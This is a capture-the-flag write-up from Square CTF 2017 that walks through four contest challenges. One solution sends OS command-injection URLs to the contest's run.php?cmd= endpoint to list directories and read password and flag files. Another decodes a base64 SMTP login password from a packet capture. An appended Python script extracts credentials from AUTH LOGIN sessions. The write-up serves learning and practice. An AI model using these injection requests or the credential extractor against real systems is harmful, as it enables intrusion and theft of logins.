Square CTF 2017 Writeup

This competition was held from 2017/10/4 22:00 (JST) to 2017/10/9 9:00 (JST).
I took part as a team again this time. We finished 14th out of 1334 teams with 5115 points.
I'm writing up the problems I solved myself.

Book of Allies (Grace Hopper 5)

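Select the schedule tab and look at the PDF linked from there.
The flag appears to be the company name of the topmost session on the left side of the page where the staples are exposed, that is, the middle page. There are 35 pages in total, so I look at the left side of page 18.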

flag-thought-leadership-lab

Password checker (Web Security 50)

OS commands can be executed, but only one line of the result is displayed.

https://neget-kymud-nihat-fagoh-mifip.capturethesquare.com/run.php?cmd=cat%20../password.txt
password123

https://neget-kymud-nihat-fagoh-mifip.capturethesquare.com/run.php?cmd=ls%20-l%20..
-rw-r--r-- 3 root root 15 Oct 4 10:34 xxx_not_a_flag.txt

https://neget-kymud-nihat-fagoh-mifip.capturethesquare.com/run.php?cmd=ls%20-l%20../..
drwxr-xr-x 3 root root 4096 Oct 4 10:47 www

https://neget-kymud-nihat-fagoh-mifip.capturethesquare.com/run.php?cmd=ls%20-l%20../../..
drwxr-xr-x 1 root root 4096 Oct 4 10:47 var

https://neget-kymud-nihat-fagoh-mifip.capturethesquare.com/run.php?cmd=ls%20../f*
../flag.txt

https://neget-kymud-nihat-fagoh-mifip.capturethesquare.com/run.php?cmd=cat%20../flag.txt
line 2: flap-31aac7e26de449ee

https://neget-kymud-nihat-fagoh-mifip.capturethesquare.com/run.php?cmd=tac%20../flag.txt
line 1: flag-bc0a804287546c09
flag-bc0a804287546c09

The General's Cat (Crypto 50)

Caesar cipher. I decrypted it with the following tool: https://www.geocachingtoolbox.com/index.php?lang=en&page=caesarCipher

Rotation 17:
The domestic cat (Felis silvestris catus or Felis catus) is a small, typically furry, carnivorous mammal. They are often called house cats when kept as indoor pets or simply cats when there is no need to distinguish them from other felids and felines. Cats are often valued by humans for companionship and for their ability to hunt vermin. There are more than 70 cat breeds, though different associations proclaim different numbers according to their standards. The flag is the phrase with dashes: flag what is a domestic cat.
flag-what-is-a-domestic-cat

The Robot's Grandmother (Forensics 50)

Look at the SMTP session as a TCP stream.

220 x.shh.sh ESMTP Exim 4.86 Wed, 06 Sep 2017 22:11:43 +0000
ehlo x.shh.sh
250-x.shh.sh Hello x.shh.sh [::1]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-AUTH LOGIN
250-STARTTLS
250-PRDR
250 HELP
auth login
334 VXNlcm5hbWU6
bWFsbG9yeQ==
334 UGFzc3dvcmQ6
ZmxhZy1zcGluc3Rlci1iZW5lZml0LWZhbHNpZnktZ2FtYmlhbg==
535 Incorrect authentication data
421 x.shh.sh lost input connection
$ echo ZmxhZy1zcGluc3Rlci1iZW5lZml0LWZhbHNpZnktZ2FtYmlhbg== | base64 -d
flag-spinster-benefit-falsify-gambian
flag-spinster-benefit-falsify-gambian
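
The same decoding done over the whole stream, as an added example that is not part of the original write-up: it pairs each base64 334 challenge with the client's reply, which shows how much an AUTH LOGIN exchange sent without STARTTLS exposes to anyone holding the capture. SESSION is a sample constructed from the lines above, and the function names are my own.

```python
import base64

# Constructed sample: the client/server lines from the TCP stream shown above.
SESSION = """\
220 x.shh.sh ESMTP Exim 4.86 Wed, 06 Sep 2017 22:11:43 +0000
ehlo x.shh.sh
250-AUTH LOGIN
250-STARTTLS
250 HELP
auth login
334 VXNlcm5hbWU6
bWFsbG9yeQ==
334 UGFzc3dvcmQ6
ZmxhZy1zcGluc3Rlci1iZW5lZml0LWZhbHNpZnktZ2FtYmlhbg==
535 Incorrect authentication data
"""


def b64_text(text):
    """Decode base64 to text; return None when the input is not valid base64."""
    try:
        return base64.b64decode(text, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def extract_auth_login(session):
    """Return one {prompt: value} dict per AUTH LOGIN attempt in the stream."""
    attempts, current, prompt = [], None, None
    for line in (raw.strip() for raw in session.splitlines()):
        if line.lower().startswith("auth login"):
            current, prompt = {}, None
            attempts.append(current)
            parts = line.split()
            if len(parts) == 3:  # some clients send the username inline
                current["Username"] = b64_text(parts[2])
        elif current is not None and line.startswith("334 "):
            prompt = b64_text(line[4:])  # server challenge, e.g. "Username:"
        elif current is not None and prompt is not None:
            current[prompt.rstrip(":")] = b64_text(line)  # client's answer
            prompt = None
        elif line[:3].isdigit() and not line.startswith("334"):
            current = None  # any other server reply ends the exchange
    return attempts


if __name__ == "__main__":
    for attempt in extract_auth_login(SESSION):
        print(attempt)
```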